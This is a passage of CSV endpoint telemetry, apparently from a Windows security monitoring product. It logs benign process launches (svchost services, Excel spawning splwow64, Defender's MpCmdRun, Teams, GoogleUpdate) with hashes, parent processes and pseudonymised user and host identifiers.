00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:22:50.500402700+00:00,2021-06-24 09:24:42.530009600+00:00,2ceb6442-fc34-42be-b50a-884b56f5769d,computerpii_0a470890c60768167990033d701e7bd881398861,178238,False,10.7740.19041.1052,False,11540474045177594,,11540474045177597,2021-06-24 09:22:48.854060200+00:00,6880,2021-06-24 09:22:48.854060200+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,6880,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,64015672,2021-06-03 12:57:23+00:00,2021-06-12 08:57:18.880777600+00:00,2021-06-24 03:25:16.636305400+00:00,2021-06-12 08:57:18.794658+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1025.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel
+402,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:22:55.768404800+00:00,17528,svchost.exe,svchost.exe -k netsvcs -p -s wlidsvc,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:22:56.062033700+00:00,2021-06-24 09:24:42.531339500+00:00,6191f366-7e2d-4efe-8d26-a5151d514925,computerpii_0a470890c60768167990033d701e7bd881398861,178253,False,10.7740.19041.1052,False,11540474045136906,,11540474045177599,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+403,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 09:23:02.799031600+00:00,7120,splwow64.exe,splwow64.exe 8192,PortableExecutable,2021-06-09 01:20:37.080697200+00:00,C:\Windows\splwow64.exe,136192,a0ae654e51f5879cb114b7b99b48b283,4191a65abc7a103829c83edf3634c763c5e824562cfb5d02bf42e1feff754e66,888063461aa1d55232ae3c7515e30a6be3858691,66d31deb154ba9b5df423b98cee537ba,e342bb0be7f5d38f8828968705ccea54ebd706a032bd50237ac4a5738638563c,2f5743f797563878746502bec5ecd37c69bab818,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 09:22:48.854060200+00:00,6880,EXCEL.EXE,"""EXCEL.EXE"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\Downloads\FilePII_744c45d2d5b1b74b646025b5099a8d3c8446adc0.xlsx""",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:23:03.029779800+00:00,2021-06-24 09:24:42.531507100+00:00,f77b5a40-e3e0-486a-87d8-084861677ed9,computerpii_0a470890c60768167990033d701e7bd881398861,178255,False,10.7740.19041.1052,False,11540474045177594,,11540474045177600,2021-06-24 09:22:48.854060200+00:00,6880,2021-06-24 09:22:48.854060200+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\EXCEL.EXE,6880,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,64015672,2021-06-03 12:57:23+00:00,2021-06-12 08:57:18.880777600+00:00,2021-06-24 03:25:16.636305400+00:00,2021-06-12 08:57:18.794658+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,1025.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Office,16.0.13801.20738,Excel,Excel.exe,Microsoft Excel,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1052,splwow64.exe,splwow64.exe,Print driver host for applications
+404,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 09:23:03.010956800+00:00,20704,svchost.exe,svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:23:03.034710800+00:00,2021-06-24 09:24:42.531559300+00:00,810e1f98-93b3-4c5a-bdad-4e69d51fcab1,computerpii_0a470890c60768167990033d701e7bd881398861,178256,False,10.7740.19041.1052,False,11540474045136906,,11540474045177601,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+405,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 09:23:08.041535+00:00,9628,svchost.exe,svchost.exe -k netsvcs -p -s gpsvc,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 09:23:08.367310300+00:00,2021-06-24 09:24:42.531662400+00:00,fce96f55-28d4-4cdf-9605-2135720657d0,computerpii_0a470890c60768167990033d701e7bd881398861,178258,False,10.7740.19041.1052,False,11540474045136906,,11540474045177602,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+406,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 09:46:19.098857+00:00,15440,svchost.exe,svchost.exe -k wsappx -p -s AppXSvc,PortableExecutable,2020-10-09 20:47:23.714846100+00:00,C:\Windows\System32\svchost.exe,57360,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,d8e577bf078c45954f4531885478d5a9,dfbea9e8c316d9bc118b454b0c722cd674c30d0a256340200e2c3a7480cba674,d7a213f3cfee2a8a191769eb33847953be51de54,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.554990700+00:00,988,services.exe,services.exe,True,2021-06-10 00:46:10.511942500+00:00,912,wininit.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 09:46:19.239466500+00:00,2021-06-23 09:48:42.929928700+00:00,4bcb26fe-c243-4cca-90e6-3c20de190966,computerpii_0a470890c60768167990033d701e7bd881398861,166643,False,10.7740.19041.1052,False,11540474045136906,,11540474045174770,2021-06-10 00:46:10.554990700+00:00,988,2021-06-10 00:46:10.554990700+00:00,\Device\HarddiskVolume3\Windows\System32\services.exe,988,128,ActiveProcessStartkey,C:\Windows\System32,714856,2060-05-15 06:03:53+00:00,2021-04-14 01:10:20.152151800+00:00,2021-06-10 00:46:12.753506800+00:00,2021-04-14 01:10:20.136168100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.928,services.exe,services.exe,Services and Controller app,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services
+407,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 06:04:19.564726100+00:00,17952,HxTsr.exe,"""HxTsr.exe"" -ServerName:Hx.IPC.Server",PortableExecutable,2021-05-03 00:36:44.904415600+00:00,C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\HxTsr.exe,93184,dcd2072a6b40e4fef68718a141941805,f45eb7734f25a0d84a96d6f6448dba929775bd8db3c22224ebcbd45aea91b791,792568e941e215bd8f09632492c73a2fcd6bf862,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 06:04:19.594267900+00:00,2021-06-24 06:06:27.895651200+00:00,d1046e16-f6d8-4850-b1c8-17cb46c73724,computerpii_0a470890c60768167990033d701e7bd881398861,176045,False,10.7740.19041.1052,False,11540474045136908,,11540474045176766,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,433423938,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13426.20920,HxTsr,HxTsr.exe,Microsoft Outlook Communications
+408,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-25 02:20:27.149860800+00:00,2748,smartscreen.exe,smartscreen.exe -Embedding,PortableExecutable,2021-06-09 01:20:39.597351200+00:00,C:\Windows\System32\smartscreen.exe,2378752,521ed922765bca8f79bd76188f879311,9605680fc164acb985c031eca2c8bc4909cf8b749c571db6de2b0b2c204c2163,183e877f488f2df9f304f60a42514a334720399f,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-25 02:20:27.298134300+00:00,2021-06-25 02:21:10.496722600+00:00,019843d2-d563-4166-a600-e2656a1170d9,computerpii_0a470890c60768167990033d701e7bd881398861,185397,False,10.7740.19041.1052,False,11540474045136908,,11540474045179041,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,469412852,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1052,smartscreen.exe,smartscreen.exe,Windows Defender SmartScreen
+409,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 07:37:45.226907200+00:00,1280,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 2D70E188-14EA-2AAD-F2BE-C318093E39DE ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:37:45.531874900+00:00,2021-06-23 07:38:09.362448+00:00,782a7290-8f24-4f2b-b805-9231654507a5,computerpii_0a470890c60768167990033d701e7bd881398861,165276,True,10.7740.19041.1052,False,11540474045145394,,11540474045174190,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+410,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 04:09:48.631152200+00:00,18220,MpCmdRun.exe,"""MpCmdRun.exe"" GetDeviceTicket -AccessKey 8B19AFD6-5197-0D8C-A332-F34999DC25FB ",PortableExecutable,2021-06-14 00:56:51.807361100+00:00,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MpCmdRun.exe,644888,86cf2e5256e9650cc1acca023d0e20c7,71cafc2ce5b1adcad16c53220a818e2db8545482506a683674f452741eb933ab,ad6d711d032d1ef2a7898f73a000f94a8bd39d0e,cecd78f3ee9d8d5cdb381f3c60ae8b1a,404d8d6ac0005cd7b57aa779ff7aca223c27cef4820c94de0a39c21604d4652b,f70eca243b0409cea2f8f642274cc13f23a22a25,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-14 00:56:58.859290200+00:00,2848,MsMpEng.exe,"""MsMpEng.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 04:09:49.407096800+00:00,2021-06-24 04:11:55.109518400+00:00,fcea6912-186c-4d0a-abde-7da0b8974f68,computerpii_0a470890c60768167990033d701e7bd881398861,175413,False,10.7740.19041.1052,False,11540474045145394,,11540474045176512,2021-06-14 00:56:58.859290200+00:00,2848,2021-06-14 00:56:58.859290200+00:00,\Device\HarddiskVolume3\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0\MsMpEng.exe,2848,18560,ActiveProcessStartkey,C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2105.5-0,136656,1998-01-06 16:00:45+00:00,2021-06-14 00:56:50.126000+00:00,2021-06-14 00:56:58.853571700+00:00,2021-06-14 00:56:51.807361100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MsMpEng.exe,MsMpEng.exe,Antimalware Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,4.18.2105.5,MpCmdRun,MpCmdRun.exe,Microsoft Malware Protection Command Line Utility
+411,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 11:41:28.050072100+00:00,15352,Teams.exe,"""Teams.exe"" --type=renderer --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --field-trial-handle=1776,16019236229012241861,14244168936898816271,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --lang=en-US --enable-wer --ms-teams-less-cors=522133263 --app-user-model-id=com.squirrel.Teams.Teams --app-path=""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\resources\app.asar"" --electron-shared-settings=eyJ********** --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2720 /prefetch:1",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 10:59:44.456855700+00:00,1656,Teams.exe,"""Teams.exe"" --system-initiated",False,2021-06-24 10:59:43.272397500+00:00,12256,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\Update.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 11:41:28.075455700+00:00,2021-06-24 11:41:52.539848200+00:00,68274a6b-cc28-475c-9d5f-012a4fd1dc43,computerpii_0a470890c60768167990033d701e7bd881398861,180204,False,10.7740.19041.1052,False,11540474045177893,,11540474045178061,2021-06-24 10:59:44.456855700+00:00,1656,2021-06-24 10:59:44.456855700+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,1656,128,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-24 00:52:38.087365500+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,465521635,465521635,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+412,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 10:51:01.328970+00:00,15092,GoogleUpdate.exe,"""GoogleUpdate.exe"" /ua /installsource scheduler",PortableExecutable,2020-11-11 01:43:46.330605500+00:00,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,155592,84e8954d8afa6b6f5025ec059144cde2,7b03a99631843989c71e6f133bd71e243f33f86516bda3455784fb11d4ff6736,bbbfe48ad185ddac29259de291045b726781484d,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 10:51:01.347411400+00:00,2021-06-23 10:53:10.666670500+00:00,f031e94d-72cf-4c9f-972d-a1c319c66bad,computerpii_0a470890c60768167990033d701e7bd881398861,167284,False,10.7740.19041.1052,False,11540474045136925,,11540474045175022,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,svchost.exe,1768,256,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Google LLC,Google Update,1.3.36.31,Google Update,GoogleUpdate.exe,Google Installer
+413,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 10:51:01.375724400+00:00,13592,backgroundTaskHost.exe,"""backgroundTaskHost.exe"" -ServerName:Microsoft.MicrosoftOfficeHub.AppX54h2e8jwdm50fj5ha8987vz1etpx7czd.mca",PortableExecutable,2020-10-09 20:47:01.870262+00:00,C:\Windows\System32\backgroundTaskHost.exe,19776,da7063b17dbb8bbb3015351016868006,20330d3ca71d58f4aeb432676cb6a3d5b97005954e45132fb083e90782efdd50,c6e63c7aae9c4e07e15c1717872c0c73f3d4fb09,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 